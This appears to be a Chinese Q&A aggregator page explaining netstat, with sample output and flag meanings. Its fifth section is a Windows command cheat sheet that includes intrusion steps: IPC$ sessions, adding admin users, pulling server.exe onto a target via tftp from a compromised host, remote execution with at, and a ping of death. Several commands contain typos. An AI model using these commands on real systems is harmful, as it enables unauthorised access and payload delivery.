netstatan命令詳解

Ⅰ Linux裡面netstat -an命令作用是什麼

題主你好,

默認情況下,netstat只顯示處於已連接狀態的連接, 而加上-a參數後會顯示所有狀態的連接, 說白了就是加上-a參數顯示的內容要大於等於不加-a參數時顯示的內容, 你也可以簡單的理解為加上-a參數後顯示的條目更多了.

不加-a:

*.需要注意的是State列不只有ESTABLISHED和LISTEN這兩種狀態,還有其它狀態, 這里就不展開了,通過上面的描述,題主先簡單的理解一下,如果想要深入的理解netstat顯示的所有內容題主還需要學習tcp,udp等協議的細節.

*.一般用的最多的就是" netstat -an | grep 埠號 " 來看看該埠號是否已經被佔用了.

=====

希望可以幫到題主, 歡迎追問.

Ⅱ netstat命令的作用

netstat命令的功能是顯示網路連接、路由表和網路介面信息，可以讓用戶得知有哪些網路連接正在運作。使用時如果不帶參數，netstat顯示活動的 TCP 連接。

該命令的一般格式為 ：

netstat [-a][-e][-n][-o][-p Protocol][-r][-s][Interval][1]

列標題：

Name介面的名字

Mtu 介面的最大傳輸單位

Net/Dest 介面所在的網路

Address 介面的IP地址

Ipkts 接收到的數據包數目

Ierrs 接收到時已損壞的數據包數目

Opkts 發送的數據包數目

Oeers 發送時已損壞的數據包數目

Collisions 由這個介面所記錄的網路沖突數目

(2)netstatan命令詳解擴展閱讀

Netstat是控制台命令，是一個監控TCP/IP網路的非常有用的工具，它可以顯示路由表、實際的網路連接以及每一個網路介面設備的狀態信息。

Netstat用於顯示與IP、TCP、UDP和ICMP協議相關的統計數據，一般用於檢驗本機各埠的網路連接情況。

Ⅲ netstat 命令詳解

netstat命令是一個監控TCP/IP網路的非常有用的工具，它可以顯示路由表、實際的網路連接以及每一個網路介面設備的狀態信息，在計算機上執行netstat後，其輸出結果為：
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 2 210.34.6.89:telnet 210.34.6.96:2873 ESTABLISHED
tcp 296 0 210.34.6.89:1165 210.34.6.84:netbios-ssn ESTABLISHED
tcp 0 0 localhost.localdom:9001 localhost.localdom:1162 ESTABLISHED
tcp 0 0 localhost.localdom:1162 localhost.localdom:9001 ESTABLISHED
tcp 0 80 210.34.6.89:1161 210.34.6.10:netbios-ssn CLOSE

Active UNIX domain sockets (w/o servers)
Proto RefCnt Flags Type State I-Node Path
unix 1 [ ] STREAM CONNECTED 16178 @000000dd
unix 1 [ ] STREAM CONNECTED 16176 @000000dc
unix 9 [ ] DGRAM 5292 /dev/log
unix 1 [ ] STREAM CONNECTED 16182 @000000df

從整體上看，netstat的輸出結果可以分為兩個部分，一個是Active Internet connections，稱為有源TCP連接，另一個是Active UNIX domain sockets，稱為有源Unix域套介面。在上面的輸出結果中，第一部分有5個輸出結果，顯示有源TCP連接的情況，而第二部分的輸出結果顯示的是Unix域套介面的連接情況。Proto顯示連接使用的協議；RefCnt表示連接到本套介面上的進程號；Types顯示套介面的類型；State顯示套介面當前的狀態；Path表示連接到套介面的其它進程使用的路徑名。
事實上，netstat是若干個工具的匯總。

◆ 顯示路由表
在隨- r標記一起調用n e t s t a t時，將顯示內核路由表，就像我們利用r o u t e命令一樣。產生的輸出如下：

[root@machine1 /]$ netstat -nr
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
210.34.6.0 0.0.0.0 255.255.255.128 U 0 0 0 eth0
192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1
127.0.0.0 0.0.0.0 255.0.0.0 U 0 0 0 lo
0.0.0.0 210.34.6.2 0.0.0.0 UG 0 0 0 eth0

- n 選項令netstat以點分四段式的形式輸出IP地址，而不是象徵性的主機名和網路名。如果想避免通過網路查找地址（比如避開DNS或NIS伺服器），這一點是特別有用的。
netstat輸出結果中，第二列展示的是路由條目所指的網關，如果沒有使用網關，就會出現一個星號（*）或者0.0.0.0；第三列展示路由的概述，在為具體的I P地址找出最恰當的路由時，內核將查看路由表內的所有條目，在對找到的路由與目標路由比較之前，將對I P地址和genmask進行按位「與」計算；第四列顯示了不同的標記，這些標記的說明如下：

■ G 路由將採用網關。
■ U 准備使用的介面處於「活動」狀態。
■ H 通過該路由，只能抵達一台主機。
■ D 如果路由表的條目是由ICMP重定向消息生成的，就會設置這個標記。
■ M 如果路由表條目已被ICMP重定向消息修改，就會設置這個標記。

netstat輸出結果的Iface顯示該連接所用的物理網卡，如eth0表示用第一張，eth1表示用第二張。

◆ 顯示介面特性

在隨- i標記一起調用時， netstat將顯示網路介面的當前配置特性。除此以外，如果調用時還帶上-a選項，它還將輸出內核中所有介面，並不只是當前配置的介面。netstat-i的輸出結果是這樣的：

[root@machine1 /]$ netstat -i
Kernel Interface table
Iface MTU Met RX-OK RX-ERR RX-DRP RX-OVR TX-OK TX-ERR TX-DRP TX-OVR Flg
eth0 1500 0 787165 0 0 1 51655 0 0 0 BRU
eth1 1500 0 520811 0 0 0 1986 0 0 0 BRU
lo 3924 0 1943 0 0 0 43 0 0 0 LRU

MTU和Met欄位表示的是介面的MTU和度量值值；RX和TX這兩列表示的是已經准確無誤地收發了多少數據包（ RX - OK / TX - OK）、產生了多少錯誤（ RX-ERR/TX-ERR）、丟棄了多少包（RX-DRP/TX-DRP），由於誤差而遺失了多少包（RX-OVR/TX-OVR）；最後一列展示的是為這個介面設置的標記，在利用ifconfig顯示介面配置時，這些標記都採用一個字母。它們的說明如下：

■ B 已經設置了一個廣播地址。
■ L 該介面是一個回送設備。
■ M 接收所有數據包（混亂模式）。
■ N 避免跟蹤。
■ O 在該介面上，禁用A R P。
■ P 這是一個點到點鏈接。
■ R 介面正在運行。
■ U 介面處於「活動」狀態。

◆ 顯示鏈接
netstat支持用於顯示活動或被動套接字的選項集。選項- t、- u、- w和- x分別表示TCP、UDP、RAW和UNIX套接字連接。如果你另外還提供了一個- a標記，還會顯示出等待連接（也就是說處於監聽模式）的套接字。這樣就可以得到一份伺服器清單，當前所有運行於系統中的所有伺服器都會列入其中。

調用netstat -ta時，輸出結果如下：

[root@machine1 /]$ netstat -ta
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 2 210.34.6.89:telnet 210.34.6.96:2873 ESTABLISHED
tcp 0 0 210.34.6.89:1165 210.34.6.84:netbios-ssn ESTABLISHED
tcp 0 0 localhost.localdom:9001 localhost.localdom:1162 ESTABLISHED
tcp 0 0 localhost.localdom:1162 localhost.localdom:9001 ESTABLISHED
tcp 0 0 *:9001 *:* LISTEN
tcp 0 0 *:6000 *:* LISTEN
tcp 0 0 *:socks *:* LISTEN
tcp 0 80 210.34.6.89:1161 210.34.6.10:netbios-ssn CLOSE

上面的輸出表明部分伺服器處於等待接入連接狀態。利用- a選項的話，netstat還會顯示出所有的套接字。注意根據埠號，可以判斷出一條連接是否是外出連接。對呼叫方主機來說，列出的埠號應該一直是一個整數，而對眾所周知服務（well known service）埠正在使用中的被呼叫方來說，netstat採用的則是取自/etc/services文件的象徵性服務名。

Ⅳ 查看伺服器當前正在連接IP列表命令是什麼

netstat
-an
netstat命令是一個監控tcp/ip網路的非常有用的工具，它可以顯示路由表、實際的網路連接以及每一個網路介面設備的狀態信息.

Ⅳ 命令提示符誰有詳細的參數說明

windows命令提示符
net use \\ip\ipc$ " " /user:" " 建立IPC空鏈接
net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C：到本地為H:
net use h: \\ip\c$ 登陸後映射對方C：到本地為H:
net use \\ip\ipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意：administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務；(如:net start telnet， net start schele)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view \\ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C：共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況，常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況）
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數：「-w數字」用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據，參數：「-l[空格]數據包大小」；「-n發送數據次數」；「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件，「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件

#2 二：

del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。（二個命令作用相同）
move 盤符\路徑\要移動的文件名 存放移動文件的路徑\移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中，"> "和"> >" 是重定向命令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務，用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at \\ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠 遠和登陸伺服器,默認埠為23
open ip 連接到IP（屬telnet登陸後的命令）
telnet 在本機上直接鍵入telnet 將進入本機的telnet
路徑\文件名1 路徑\文件名2 /y 復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件
c:\srv.exe \\ip\admin$ 復制本地c:\srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，註：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件
\\ip\admin$\svv.exe c:\ 或:\\ip\admin$\*.* 復制對方admini$共享下的srv.exe文件（所有文件）至本地C：
x 要復制的文件或目錄樹 目標地址\目錄名 復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:\server.exe 登陸後，將「IP」的server.exe下載到目標主機c:\server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送
tftp -i 對方IP put c:\server.exe 登陸後，上傳本地c:\server.exe至主機
ftp ip 埠 用於上傳文件至伺服器或進行文件操作，默認埠為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文本文件時)
route print 顯示出IP路由，將主要顯示網路地址Network addres，子網掩碼Netmask，網關地址Gateway addres，介面地址Interface
arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件（目錄）的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔，只讀，系統，隱藏 屬性；用＋則是添加為某屬性
dir 查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間
date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間，而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元 設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序，並顯示出：請按任意鍵繼續....
if 在批處理程序中執行條件處理（更多說明見if命令及變數）
goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，例如：「：start」標簽）
call 路徑\批處理文件名 從批處理程序中調用另一個批處理程序 （更多說明見call /?）
for 對一組文件中的每一個文件執行某個特定命令（更多說明見for命令及變數）
echo on或off 打開或關閉echo，僅用echo不加參數則顯示當前echo設置
echo 信息 在屏幕上顯示出信息
echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中尋找字元串hello
find 文件名 查找某文件
title 標題名字 更改CMD窗口標題名字
color 顏色值 設置cmd控制台前景和背景顏色；0＝黑、1＝藍、2＝綠、3＝淺綠、4＝紅、5＝紫、6＝黃、7=白、8=灰、9=淡藍、A＝淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改為：EntSky\ )

Ⅵ 命令提示符的功能及具體操作方法

在裡面用DOS命令，但不是所有的DOS都能使用，但也不是只能用DOS！
是電腦盲，就別用了！

Ⅶ netstat -an命令的問題

放心,你電腦安全的

Ⅷ 批處理命令解析（求解釋下面命令是什麼意思）

刪除一個或數個文件。

DEL [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names
ERASE [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names

names 指定一個或數個文件或目錄列表。通配符可被用來
刪除多個文件。如果指定了一個目錄，目錄中的所
有文件都會被刪除。

/P 刪除每一個文件之前提示確認。
/F 強制刪除只讀文件。
/S 從所有子目錄刪除指定文件。
/Q 安靜模式。刪除全局通配符時，不要求確認。
/A 根據屬性選擇要刪除的文件。
attributes R 只讀文件 S 系統文件
H 隱藏文件 A 存檔文件
- 表示「否」的前綴

如果命令擴展名被啟用，DEL 和 ERASE 會如下改變:

/S 開關的顯示句法會顛倒，即只顯示已經
刪除的文件，而不顯示找不到的文件。（不知道對你有沒有用。）